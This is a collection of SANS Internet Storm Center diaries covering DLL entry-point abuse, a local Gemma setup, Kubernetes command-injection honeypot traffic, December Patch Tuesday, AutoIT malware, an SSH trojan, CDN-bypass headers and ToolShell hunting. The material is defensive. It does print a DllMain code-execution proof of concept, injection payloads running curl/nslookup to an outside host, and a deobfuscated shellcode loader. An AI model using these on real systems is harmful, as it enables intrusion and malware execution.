In the Microsoft Windows ecosystem, DLLs (Dynamic Load Libraries) are PE files like regular programs. One of the main differences is that they export functions that can be called by programs that load them. By example, to call RegOpenKeyExA(), the program must first load the ADVAPI32.dll. A PE files has a lot of headers (metadata) that contain useful information used by the loader to prepare the execution in memory. One of them is the EntryPoint, it contains the (relative virtual) address where the program will start to execute.

In case of a DLL, there is also an entry point called logically the DLLEntryPoint. The code located at this address will be executed when the library is (un)loaded. The function executed is called DllMain()[1] and expects three parameters:

BOOL WINAPI DllMain(
  _In_ HINSTANCE hinstDLL, 
  _In_ DWORD fdwReason, 
  _In_ LPVOID lpvReserved
);

The second parmeter indicates why the DLL entry-point function is being called:

• DLL_PROCESS_DETACH (0)
• DLL_PROCESS_ATTACH (1)
• DLL_THREAD_ATTACH (2)
• DLL_THREAD_DETACH (3)

Note that this function is optional but it is usually implemented to prepare the environment used by the DLL like loading resources, creating variables, etc... Microsoft recommends also to avoid performing sensitive actions at that location.

Many maware are deployed as DLLs because it's more challenging to detect. The tool regsvr32.exe[2] is a classic attack vector because it helps to register a DLL in the system (such DLL will implement a DllRegisterServer() function). Another tool is rundll32.exe[3] that allows to call a function provided by a DLL:

C:\> rundll32.exe mydll.dll,myExportedFunction

When a suspicious DLL is being investigated, the first reflex of many Reverse Engineers is to look at the exported function(s) but don't pay attention to the entrypoint. They look at the export table:

This DllMain() is a very nice place where threat actors could store malicious code that will probably remains below the radar if you don’t know that this EntryPoint exists. I wrote a proof-of-concept DLL that executes some code once loaded (it will just pop up a calc.exe). Here is the simple code:

// evildll.cpp
#include <windows.h>
#pragma comment(lib, "user32.lib")

extern "C" __declspec(dllexport) void SafeFunction() {
    // Simple exported function
    MessageBoxA(NULL, "SafeFunction() was called!", "evildll", MB_OK | MB_ICONINFORMATION);
}

BOOL APIENTRY DllMain(HMODULE hModule,
                      DWORD  ul_reason_for_call,
                      LPVOID lpReserved) {
    switch (ul_reason_for_call) {
        case DLL_PROCESS_ATTACH:
        {
            // Optional: disable thread notifications to reduce overhead
            DisableThreadLibraryCalls(hModule);

            STARTUPINFOA si{};
            PROCESS_INFORMATION pi{};
            si.cb = sizeof(si);
            char cmdLine[] = "calc.exe";

            BOOL ok = CreateProcessA(NULL, cmdLine, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
            if (ok) {
                CloseHandle(pi.hThread);
                CloseHandle(pi.hProcess);
            } else {
                // optional: GetLastError() handling/logging
            }
            break;
        }
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
            break;
    }
    return TRUE;
}

And now, a simple program used to load my DLL:

// loader.cpp
#include <windows.h>
#include <stdio.h>

typedef void (*SAFEFUNC)();

int main()
{
    // Load the DLL
    HMODULE hDll = LoadLibraryA("evildll.dll");
    if (!hDll)
    {
        printf("LoadLibrary failed (error %lu)\n", GetLastError());
        return 1;
    }
    printf("[+] DLL loaded successfully\n");

    // Resolve the function
    SAFEFUNC SafeFunction = (SAFEFUNC)GetProcAddress(hDll, "SafeFunction");
    if (!SafeFunction)
    {
        printf("GetProcAddress failed (error %lu)\n", GetLastError());
        FreeLibrary(hDll);
        return 1;
    }
    printf("[+] SafeFunction() resolved\n");

    // Call the function
    SafeFunction();

    // Unload DLL
    FreeLibrary(hDll);

    return 0;
}

Let's compile the DLL, the loader and execute it:

When the DLL is loaded with LoadLibraryA(), the calc.exe process is spawned automatically, even if no DLL function is invoked!

Conclusion: Always have a quick look at the DLL entry point!

[1] https://learn.microsoft.com/en-us/windows/win32/dlls/dllmain
[2] https://attack.mitre.org/techniques/T1218/010/
[3] https://attack.mitre.org/techniques/T1218/011/

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Several months ago, I got a Nucbox K8 Plus minicomputer to use as a Proxmox 9 server. At the time of this acquisition, I didn't realize this minicomputer had an artificial intelligence (AI) engine [1] build in the CPU that could be used to run AI applications locally. A coworker recommended that I try Google Gemma 3 as a local AI open model to work with my use cases.

"Gemma is a family of generative artificial intelligence (AI) models and you can use them in a wide variety of generation tasks, including question answering, summarization, and reasoning." [2], a review of the Gemma 3 key features is also posted on this page. This page [3] lists the minimum requirements for the 5 Gemma 3 models 270M, 1B, 4B, 12B, and 27B.

Default Open WebUI

My Setup with Open WebUI

• OS is a Linux Container (LXC) Ubuntu 24.04
• Ollama with gemma3:12b [4]
• Open WebUI [5]

Installing Ollama with Gemma 3

I used these steps to get Gemma setup. First review the requirements for RAM [3] before deciding with Gemma 3 model to install. You can start small (i.e. 4B or smaller) for testing before using a larger model. I'm using  4B and 12B with 16 GB of RAM with my installation. 

If you want to test some queries before installing the WebUI, this last command will open the interpreter:

ollama run gemma3:4b

Since I have a Ryzen 7 CPU, my next step was to install the admgpu [7] software to use the AI features of the CPU. The last step is to install the graphical interface to work from a browser using the Open WebUI [5] and there are several models listed here to get the WebUI running. I had to try a few combinations; in the end this is what I used:

sudo docker run -d -p 80:8080 -v ollama:/root/.ollama --add-host=host.docker.internal:host-gateway -v open-webui:/app/backend/data --name open-webui --restart always ghcr.io/open-webui/open-webui:main

Bugs in Proxmox 9 for LXC and AppArmor

For the Linux Container to run correctly, I had to edit the edit the LXC config file (114 is the container number) and add those two lines:

vi /etc/pve/lxc/114.conf

• lxc.apparmor.profile: unconfined
• lxc.mount.entry: /dev/null sys/module/apparmor/parameters/enabled none bind 0 0

And it may also be necessary to add this as well in the sudo command before installing the docker: --security-opt apparmor:unconfined

Login WebUI Interface

After the installation of the WebUI, you need to create the first admin account before being able to login.My first query asked my AI to describe the IPv4 header:

Gemma 3 offers the ability to work with large files with its 128K context, work with images and has multilingual support which is practical if you know multiple languages. Finally, it can run locally in PC, laptop and smartphone on a single GPU or TPU and smaller devices. If you have experience using Gemma 3, what are the use cases you are using it? You can add your comments in our contact form.

[1] https://www.amd.com/en/products/processors/laptop/ryzen/8000-series/amd-ryzen-7-8845hs.html
[2] https://ai.google.dev/gemma/docs/core
[3] https://ai.google.dev/gemma/docs/core#sizes
[4] https://deepmind.google/models/gemma/gemma-3/
[5] https://github.com/open-webui/open-webui
[6] https://ai.google.dev/gemma/docs/integrations/ollama?utm_source=deepmind.google&utm_medium=referral&utm_campaign=gdm&utm_content
[7] https://rocm.docs.amd.com/projects/radeon-ryzen/en/latest/docs/install/installryz/native_linux/install-ryzen.html
[8] https://forum.proxmox.com/threads/priviledge-container-disabling-apparmor-does-not-work.122168/
[9] https://blog.ktz.me/apparmors-awkward-aftermath-atop-proxmox-9/
[10] https://docs.openwebui.com/

-----------
Guy Bruneau IPSS Inc.
My GitHub Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Last year, Kubernetes fixed a command injection vulnerability in the Kubernetes NodeLogQuery feature (%%cve:2024-9042%%) [1]. To exploit the vulnerability, several conditions had to be met:

• The vulnerable node had to run Windows
• The attacker had to have permissions to read logs
• The NogeLogQuery feature had to be enabled (at least at the time, it was in "Beta" and not enabled by default)

The sample exploits posted at the time passed the OS command as a GET parameter. For example [2]

curl  "<Kubernetes API Proxy server IP>/api/v1/nodes/<NODE name>/proxy/logs/?query=nssm&pattern=’\$(Start-process cmd)’"

The exploit uses '$(oscommand)' as a "pattern", and sends a query to the "/logs/" endpoint. Overall, a classic OS command injection issue.

Starting a couple of days ago, I spotted some requests sent to our honeypots that followed a similar pattern. It isn't clear to me if this is essentially the same vulnerability or something completely different. The exploit used the "logs" endpoint and achieves command injection via the "$(oscommand)" pattern, but this time around it includes the command as part of the path. There is a chance that something like this will work, as path elements are often used by APIs.

Google suggests CVE-2024-9042, but this may be something completely different. Please let me know if you have any ideas. Here is a sample request as captured by a honeypot:

GET /$(nslookup%20-q=cname%20[redacted].bxss.me||curl%20[redacted].bxss.me)/logs/
accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
accept-encoding: gzip,deflate
user-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
host: [redacted]
connection: Keep-alive

 

[1] https://www.openwall.com/lists/oss-security/2025/01/16/1
[2] https://www.akamai.com/blog/security-research/kubernetes-log-query-rce-windows

--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

This release addresses 57 vulnerabilities. 3 of these vulnerabilities are rated critical. One vulnerability was already exploited, and two were publicly disclosed before the patch was released.

CVE-2025-62221: This privilege escalation vulnerability in the Microsoft Cloud Files Mini Filters driver is already being exploited.

CVE-2025-54100: A PowerShell script using Invoke-WebRequest may execute scripts that are included in the response. This is what Invoke-WebRequest is supposed to do. The patch adds a warning suggesting adding the -UseBasicParsing parameter to avoid executing scripts.

CVE-2025-64671: The GitHub Copilot plugin for JetBrains may lead to remote code execution. This is overall an issue with many AI code assistance as they have far-reaching access to the IDE.

The critical vulnerabilities are remote code execution vulnerabilities in Office and Outlook.

 

Description
CVE	Disclosed	Exploited	Exploitability (old versions)	current version	Severity	CVSS Base (AVG)	CVSS Temporal (AVG)
Application Information Service Elevation of Privilege Vulnerability
%%cve:2025-62572%%	No	No	-	-	Important	7.8	6.8
Azure Monitor Agent Remote Code Execution Vulnerability
%%cve:2025-62550%%	No	No	-	-	Important	8.8	7.7
DirectX Graphics Kernel Denial of Service Vulnerability
%%cve:2025-62463%%	No	No	-	-	Important	6.5	5.7
%%cve:2025-62465%%	No	No	-	-	Important	6.5	5.7
DirectX Graphics Kernel Elevation of Privilege Vulnerability
%%cve:2025-62573%%	No	No	-	-	Important	7.0	6.1
GitHub Copilot for Jetbrains Remote Code Execution Vulnerability
%%cve:2025-64671%%	Yes	No	-	-	Important	8.4	7.3
Microsoft Access Remote Code Execution Vulnerability
%%cve:2025-62552%%	No	No	-	-	Important	7.8	6.8
Microsoft Brokering File System Elevation of Privilege Vulnerability
%%cve:2025-62469%%	No	No	-	-	Important	7.0	6.1
%%cve:2025-62569%%	No	No	-	-	Important	7.0	6.1
Microsoft Edge (Chromium-based) for Mac Spoofing Vulnerability
%%cve:2025-62223%%	No	No	-	-	Low	4.3	3.8
Microsoft Excel Remote Code Execution Vulnerability
%%cve:2025-62561%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-62563%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-62564%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-62553%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-62556%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-62560%%	No	No	-	-	Important	7.8	6.8
Microsoft Exchange Server Elevation of Privilege Vulnerability
%%cve:2025-64666%%	No	No	-	-	Important	7.5	6.5
Microsoft Exchange Server Spoofing Vulnerability
%%cve:2025-64667%%	No	No	-	-	Important	5.3	4.6
Microsoft Message Queuing (MSMQ) Elevation of Privilege Vulnerability
%%cve:2025-62455%%	No	No	-	-	Important	7.8	6.8
Microsoft Office Remote Code Execution Vulnerability
%%cve:2025-62554%%	No	No	-	-	Critical	8.4	7.3
%%cve:2025-62557%%	No	No	-	-	Critical	8.4	7.3
Microsoft Outlook Remote Code Execution Vulnerability
%%cve:2025-62562%%	No	No	-	-	Critical	7.8	6.8
Microsoft SharePoint Server Spoofing Vulnerability
%%cve:2025-64672%%	No	No	-	-	Important	8.8	7.7
Microsoft Word Remote Code Execution Vulnerability
%%cve:2025-62555%%	No	No	-	-	Important	7.0	6.1
%%cve:2025-62558%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-62559%%	No	No	-	-	Important	7.8	6.8
PowerShell Remote Code Execution Vulnerability
%%cve:2025-54100%%	Yes	No	-	-	Important	7.8	6.8
Win32k Elevation of Privilege Vulnerability
%%cve:2025-62458%%	No	No	-	-	Important	7.8	6.8
Windows Camera Frame Server Monitor Information Disclosure Vulnerability
%%cve:2025-62570%%	No	No	-	-	Important	7.1	6.2
Windows Client-Side Caching Elevation of Privilege Vulnerability
%%cve:2025-62466%%	No	No	-	-	Important	7.8	6.8
Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability
%%cve:2025-62454%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-62457%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-62221%%	No	Yes	-	-	Important	7.8	6.8
Windows Common Log File System Driver Elevation of Privilege Vulnerability
%%cve:2025-62470%%	No	No	-	-	Important	7.8	6.8
Windows DWM Core Library Elevation of Privilege Vulnerability
%%cve:2025-64679%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-64680%%	No	No	-	-	Important	7.8	6.8
Windows Defender Firewall Service Information Disclosure Vulnerability
%%cve:2025-62468%%	No	No	-	-	Important	4.4	3.9
Windows DirectX Information Disclosure Vulnerability
%%cve:2025-64670%%	No	No	-	-	Important	6.5	5.7
Windows File Explorer Elevation of Privilege Vulnerability
%%cve:2025-64658%%	No	No	-	-	Important	7.5	6.5
%%cve:2025-62565%%	No	No	-	-	Important	7.3	6.4
Windows Hyper-V Denial of Service Vulnerability
%%cve:2025-62567%%	No	No	-	-	Important	5.3	4.6
Windows Installer Elevation of Privilege Vulnerability
%%cve:2025-62571%%	No	No	-	-	Important	7.8	6.8
Windows Projected File System Elevation of Privilege Vulnerability
%%cve:2025-62461%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-62462%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-62464%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-55233%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-62467%%	No	No	-	-	Important	7.8	6.8
Windows Remote Access Connection Manager Elevation of Privilege Vulnerability
%%cve:2025-62472%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-62474%%	No	No	-	-	Important	7.8	6.8
Windows Resilient File System (ReFS) Remote Code Execution Vulnerability
%%cve:2025-62456%%	No	No	-	-	Important	8.8	7.7
Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability
%%cve:2025-62473%%	No	No	-	-	Important	6.5	5.7
Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
%%cve:2025-62549%%	No	No	-	-	Important	8.8	7.7
%%cve:2025-64678%%	No	No	-	-	Important	8.8	7.7
Windows Shell Elevation of Privilege Vulnerability
%%cve:2025-64661%%	No	No	-	-	Important	7.8	6.8
Windows Storage VSP Driver Elevation of Privilege Vulnerability
%%cve:2025-64673%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-59516%%	No	No	-	-	Important	7.8	6.8
%%cve:2025-59517%%	No	No	-	-	Important	7.8	6.8

--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

AutoIT3[1] is a powerful language that helps to built nice applications for Windows environments, mainly to automate tasks. If it looks pretty old, the latest version was released last September and it remains popular amongst developers, for the good… or the bad! Malware written in AutoIt3 has existed since the late 2000s, when attackers realized that the language was easy to learn (close to basic) but can also compiled into standalone PE files! From a malware point of view, such executables make an extended use of packed data, making them more stealthy.

If it became less popular, AutoIT3 is still used by some attackers. I found a sample yesterday that (ab)use a nice feature of the language. The sample was delivered in a ZIP archive, containing a PE fille: ENQ-2548871-PO-AYPC-352-25-UN-01162.exe (SHA256:1e75512b85b8ad27966ea850b69290bc18cc010bcb4f0e1ef119b82c99ca96c0). The file has a VT score of 33/72[2].

The technique used by the threat actor relies on the function FileInstall()[3]. Its purpose is to to include a file into an executed script but… the behavior is subtle and depends on how the script is run. The script call this code:

FileInstall ( "inhumation" , @TempDir & "\inhumation" , 1 )

How does it work?

• If the script is parsed, the source file must exist all the time.
• If the script is compiled, the file must exist at compile time only! (It is embedded into the PE file)

When the payload was executed, indeed, it created the file ‘inhumation’ in %TEMP%!

Clasically, the remaining code is obfuscated. The magic is perfomed with a simple function LGYJSYH():

Func LGYJSYH ( $LVRVBGKY )
    Local $PYYTLPGF = ""
    For $WVILGLOS = 1 To StringLen ( $LVRVBGKY )
        Local $NCMTXMB = Asc ( StringMid ( $LVRVBGKY , $WVILGLOS , 1 ) )
        $PYYTLPGF &= Chr ( $NCMTXMB - ( 1 ^ $WVILGLOS ) )
    Next
    Return $PYYTLPGF
EndFunc

The purpose is very simple: it parses a string, and for every character, if converts it with the previous one in the ASCII table (-1). Don't be fooled, the "^" does not reveal some XOR manipulation. In AutoIT, "^" is exponentiation!

In Python, we should have something like this:

def LGYJSYH(s):
    return "".join(chr(ord(c) - 1) for c in s)

Example:

>>> def OZTTVUH(s):
...     return "".join(chr(ord(c) - 1) for c in s)
...
>>> OZTTVUH("lfsofm43")
'kernel32'

Two files are loaded via FileInstall() and one of them is an obfuscated shellcode.

Here is the technique used by the sample to load and execute it:
(The code has been deobfuscated for easier reading)

; Unpack the shellcode on disk
FileInstall ( "buncal" , @TempDir & "\buncal" , 1 )

; Read the shellcode file content
$FMMKSJE = Execute ( "lgyjsyh(FileRead(@TempDir “”\buncal"))" )

; Get the shellcode length
$IXWCTFHCT = BinaryLen ( $FMMKSJE )

; Allocate executable memorty (0x40) to contain the shellcode
$PUJFJJN = DllCall ( “kernel32” , “ptr”, “VirtualAlloc”, “dword" , “0” , “dword”, $IXWCTFHCT, “dword”, “0x3000”, “dword”, “0x40”))[0]

; Prepate the allocated memory as a DLL structure
$QMDAZCZGFO = DllStructCreate ( “byte [“ & $IXWCTFHCT & “]” ) , $PUJFJJN )

; Loads the shellcode in memory
DllStructSetData ( $QMDAZCZGFO , 1 , $FMMKSJE )

; Launch the shellcode!
DllCall ( “user32.dll” , “ptr”, “CallWindowProc”, “ptr”, $PUJFJJN + 9296 , “ptr”, 0 , “ptr”,, 0 , “ptr”, 0 , “ptr”, 0 )

I already covered the use of CallWindowProc() to load a shell code in a previous diary[4]

There is ongoing wave of such samples. I already spotted two samples that use the same technique:

• "ENQ-2548871-PO-AYPC-352-25-UN-01162.exe" (SHA256:1e75512b85b8ad27966ea850b69290bc18cc010bcb4f0e1ef119b82c99ca96c0)
  • Delivers a Quasar RAT:
• ENQ_DB9002M_ORDER_M24093_2025.exe (SHA256:7eb8ae8f1216a377da6ccd0cee0b21f2700e9bbc46ae3ebfa876e70296aa4539)
  • Delivers a Phantom stealer

Conclusion: Keep an eye on FileInstall() in AutoIT3 scripts!

[1] https://www.autoitscript.com/site/
[2] https://www.virustotal.com/gui/file/1e75512b85b8ad27966ea850b69290bc18cc010bcb4f0e1ef119b82c99ca96c0
[3] https://www.autoitscript.com/autoit3/docs/functions/FileInstall.htm
[4] https://isc.sans.edu/diary/Interesting+Technique+to+Launch+a+Shellcode/32238

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

[This is a Guest Diary by Jackie Nguyen, an ISC intern as part of the SANS.edu BACS program]

The ISC internship didn't just teach me about security, it changed how I thought about threats entirely. There's something intriguing about watching live attacks materialize on your DShield Honeypot, knowing that somewhere across the world, an attacker just made a move. And the feedback loop of writing detailed attack observations, then having experienced analysts critique and refine your analysis? That's where real learning happens. One attack observation in particular stands out as a perfect example of what makes this internship so powerful. Let me show you what I discovered!

The Beginning…

On November 10, 2025, my honeypot captured very interesting activity that really demonstrates how evolved modern threat actors are getting. What initially appeared to be a simple, but successful SSH brute force attempt quickly revealed itself as something far more concerning, a deployment of an advanced trojan designed for long-term persistence and evasion.

What happened?

Suspicious activity was detected when the IP address 103[.]148[.]195[.]161 successfully SSH’d into my honeypot using the credentials username “root” and password “linux”. The bad actor maintained access to the honeypot for 1 minute and 45 seconds but ultimately ran no commands. Instead, the attacker uploaded a single file, a trojan binary named “sshd” designed to evade security detections by pretending to be the OpenSSH daemon. It was an Executable and Linkable Format (ELF) binary (7a9da7d10aa80b0f9e2e3f9e518030c86026a636e0b6de35905e15dd4c8e3e2d) that was classified as malicious by VirusTotal and Hybrid-Analysis.

We won’t be able to see what the Trojan did on my honeypot at this time, however, I found the hash on Hybrid-Analysis and got a good idea of what the trojan does.

A screenshot of the cowrie output using Jesse La Grew’s cowrieprocessor [4]

Trojan File Analysis

MITRE ATT&CK MAPPING

•    T1078 - Valid Accounts
•    T1110.001 - Brute Force
•    T1204.002 - User Execution
•    T1036.005 - Masquerading
•    T1554 - Compromise Client Software Binary
•    T1548.001 - Abuse Elevation Control Mechanism
•    T1027 - Obfuscated Files or Information
•    T1497 - Virtualization/Sandbox Evasion
•    T1480 - Execution Guardrails
•    T1003.008 - OS Credential Dumping

Prevent Similar Attacks

1.    Disable Password Authentication and utilize SSH keys instead
2.    IP Allowlisting
3.    IDS/IPS/EDR
4.    Threat Hunting
5.    MFA

What does this show?

This really shows how much effort sophisticated attackers would put in for long-term persistence and advanced evasion. Attacks from a government IP address doesn’t always mean it’s the government; it more than likely would mean that they were compromised. If you think about it logically, why would a nation-state threat actor use their actual government IP address to execute attacks?

Importance?

It’s important when working on a high performing security team to not attribute attacks to the wrong threat actor. Politically, this may cause problems, especially if the company you’re working for has a large media presence. Problems including wrongful retaliation and political tension could arise from making this mistake.

This attack also shows how threat actors use legitimate processes to blend in with normal ones. We must remember that the goal of this attacker is most likely long-term so they will do everything they can to evade your defenses.

Actionable Intelligence for Defenders

Threat hunting is a critical part of any security program and having concrete Indicators of Compromise (IOCs) like file hashes, malicious IP addresses, and more would give teams actionable intelligence to use immediately. This observation also helps defenders understand what to look for. Brief sessions without commands can be just as dangerous as those with suspicious activity.

Key Takeaways

This attack really shows how threat actors are getting more sophisticated. By uploading a legitimate looking trojan instead of running commands, the attacker could have avoided the typical red flags most monitoring tools look for. The use of a government IP address also teaches us an important lesson not to immediately jump to conclusions solely based on IP block owner since it might have been compromised. For analysts out there, what seems to be a quiet session can sometimes be the most dangerous.

[1] https://www.virustotal.com/gui/file/7a9da7d10aa80b0f9e2e3f9e518030c86026a636e0b6de35905e15dd4c8e3e2d/detection
[2 ]https://www.abuseipdb.com/whois/103.148.195.161
[3] https://hybridanalysis.com/sample/7a9da7d10aa80b0f9e2e3f9e518030c86026a636e0b6de35905e15dd4c8e3e2d/6542c8b6abeb51c5ee0bbf2a
[4] https://github.com/jslagrew/cowrieprocessor
[5] https://www.sans.edu/cyber-security-programs/bachelors-degree/

-----------
Guy Bruneau IPSS Inc.
My GitHub Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Currently, in order to provide basic DDoS protection and filter aggressive bots, some form of Content Delivery Network (CDN) is usually the simplest and most cost-effective way to protect a web application. In a typical setup, DNS is used to point clients to the CDN, and the CDN will then forward the request to the actual web server. There are a number of companies offering services like this, and cloud providers will usually have solutions like this as well.

However, this setup comes with a significant weakness: If an attacker can identify the IP address of the actual web server, they are often able to bypass the CDN and reach the web server directly. There are a few ways to prevent this. Depending on the CDN selected, it may be possible to allow access only from the CDN's IP address space. However, for some of the larger providers, this list of addresses may be large and very dynamic. Another option is to add custom headers. Some CDNs offer special custom headers with randomized values to identify requests that passed through the CDN. A less secure (lazier?) option is to look for any header that identifies the CDN. This last option should be avoided, as attackers can easily include this header.

In recent days, our honeypots detected an uptick of requests that included these CDN-related headers, indicating that attackers may attempt to bypass this protection. For example:

Cf-Warp-Tag-Id

This header started showing up yesterday and is associated with Cloudflare's "Warp" VPN service. The scans do include a random-looking value, but may count on the value to either not be verified, or the request actually went through the Cloudflare Warp VPN to obfuscate its source.

X-Fastly-Request-Id

As the name implies, this header is associated with the Fastly CDN. It started showing up in our data on November 20th.

X-Akamai-Transformed

A header added by Akamai. Also started showing up on November 20th (so are the remaining headers)

X-T0Ken-Inf0

Not sure what this header is used for (any ideas? Let me know). It looks like it could contain some form of authentication token, but the "l33t spelling" is odd.

x-sfdc-request-id
x-sfdc-lds-endpoints

These headers are used by Salesforce to track requests. 

Around the same time, we also started seeing a lot of headers starting with the string "Xiao9-", but I have no idea what they are used for. If anybody has any ideas, please let me know :)

--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

[This is a Guest Diary by James Woodworth, an ISC intern as part of the SANS.edu Bachelor's Degree in Applied Cybersecurity (BACS) program [1].

In July 2025, many of us were introduced to the Microsoft SharePoint exploit chain known as ToolShell. ToolShell exploits the deserialization and authentication bypass vulnerabilities, CVE-2025-53770 [2] and CVE-2025-53771 [3], in on-premises SharePoint Server 2016, 2019, and Subscription editions. When the exploit chain was initially introduced, threat actors used payloads that attempted to upload web shells to a SharePoint server’s file system. The problem for threat actors was that the uploaded web shells were easily detectable by most Endpoint Detection and Response (EDR) solutions. So the threat actors upped the game and reworked their payloads to execute in-memory. This new technique made it more difficult for defenders to detect the execution of these new payloads [4].

Many articles have been written on the technical details of the ToolShell vulnerabilities, so I won’t go into an in-depth analysis here. If you want an in-depth analysis, check out the Securelist article, ToolShell: a story of five vulnerabilities in Microsoft SharePoint [5]. What I will present to you in this post is a process using Zeek Network Security Monitor, DaemonLogger, and Wireshark to hunt for in-memory ToolShell exploit payloads and how to decode them for further analysis.

Review Zeek Logs

The first step in the hunt is to review the HTTP requests to our SharePoint server. We will do this by reviewing our Zeek http logs and looking for POST requests that contain the following indicators of a malicious request:

• URLs:
  • /_layouts/15/ToolPane.aspx/<random>?DisplayMode=Edit&<random>=/ToolPane.aspx
  • /_layouts/16/ToolPane.aspx/<random>?DisplayMode=Edit&<random>=/ToolPane.aspx
• Referer headers:
  • /_layouts/SignOut.aspx
  • /_layouts/./SignOut.aspx
• Request Body:
  • Length greater than 0

Zeek log files are rotated and compressed daily. To review the compressed log files over multiple days we use a combination of two tools, zcat and zcutter.py [6]. From the /opt/zeek/logs directory we run the following commands to search all Zeek http logs for August 2025.

zcat 2025-08**/http*.log.gz | ~/bin/zcutter.py -d ts id.orig_h id.resp_p host method uri user_agent request_body_len | grep ToolPane | grep -v "\"request_body_len\": 0}"

Reviewing the returned http logs entries, we see many matching the indicators of a malicious request. We will focus on the highlighted entries from August 24, 2025.

Figure 1: Zeek http.log file matching indicators of a malicious request.

 

Prepare PCAP Files

Now that we have identified potential http requests to analyze further, our next step in the hunt will be to prepare our PCAP files for packet analysis. For this scenario we are using DaemonLogger to capture packets [7]. Each day DaemonLogger creates two PCAP files.

 

Figure 2: DaemonLogger PCAP files from October 31, 2025.

 

We will need to merge the two PCAP files to ensure we are analyzing all packets that were captured for the day in question. To do this we will use the tool mergecap from Wireshark [8]. The following command will merge the two PCAP files that we identified in Figure 2 above into a new file named 2025-08-24.pcap.

./mergecap ~/pcaps/daemonlogger.pcap.* -w ~/pcaps/2025-08-24.pcap

 

Figure 3: Mergecap command and resulting merged PCAP file.

 

Packet Analysis with Wireshark

We will now analyze the newly created PCAP file using Wireshark. With the following filter we can limit the packets displayed to only those packets containing POST requests to the URL /_layouts/15/ToolPane.aspx.

Filter: _ws.col.info matches "POST /_layouts/15/ToolPane.aspx"

 

Figure 4: Wireshark displaying packets containing POST requests to the URL /_layouts/15/ToolPane.aspx.

 

Analyzing the packet with the timestamp 2025-08-24T04:22:33, we see an HTTP POST request to the URL /_layouts/15/toolpane.aspx/lx?DisplayMode=Edit&lx=/ToolPane.aspx and a Referer header of /_layouts/./SignOut.aspx. The analysis also shows a URL encoded payload being sent via the MSOtlPn_DWP parameter. The parameter contains a property named CompressedDataTable that in turn contains a malicious payload that attempts to exploit the SharePoint deserialization vulnerability.

 

Figure 5: Wireshark HTTP Stream showing malicious POST request

 

Deserialization Vulnerability Payload Analysis

Our hunt is almost complete. Now it is time to decode the malicious deserialization payload to see what it contains. With the Wireshark HTTP Stream window still open, copy the CompressedDataTable property and save to a file named property-encoded.txt. This will include everything between CompressedDataTable%3D%22 and %22+DataTable-CaseSensitive. The property usually starts with the characters H4sI.

 

Figure 6: Wireshark HTTP Stream highlighting the beginning of the CompressedDataTable property.

 

With the CompressedDataTable property copied to a file we can decode the property using the commands below and output the results to the file property-decoded.txt.

cat property-encoded.txt | python3 -c "import sys, urllib.parse as ul; print(ul.unquote_plus(sys.stdin.read().strip()))" | base64 -d | zcat > property-decoded.txt

 

Figure 7: Decoded view of the CompressedDataTable property with the encoded malicious payload.

 

One more copy and decode and we will have our malicious in-memory payload. Open the property-decoded.txt file created in the step above. Copy the MethodParameter string to a new file named method-encoded.txt. The beginning of the string is highlighted in Figure 7 above. We will then run the following commands to decode the method.

cat method-encoded.txt | base64 -d > method-decoded.txt

